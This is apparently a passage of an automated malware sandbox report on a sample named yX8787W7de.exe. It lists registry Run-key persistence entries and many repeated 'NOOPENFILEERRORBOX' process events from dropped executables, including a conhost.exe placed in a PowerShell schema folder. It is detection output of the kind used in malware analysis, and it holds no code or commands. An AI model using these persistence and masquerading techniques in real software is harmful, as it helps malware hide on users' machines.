Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MsintoRefcommonsvc	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MsintoRefcommonsvc	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MsintoRefcommonsvc	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SwjJGfgwqbpLdPqvPFcqLsY	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SwjJGfgwqbpLdPqvPFcqLsY	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SwjJGfgwqbpLdPqvPFcqLsY	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SwjJGfgwqbpLdPqvPFcqLsY	Jump to behavior

Source: C:\Users\user\Desktop\yX8787W7de.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
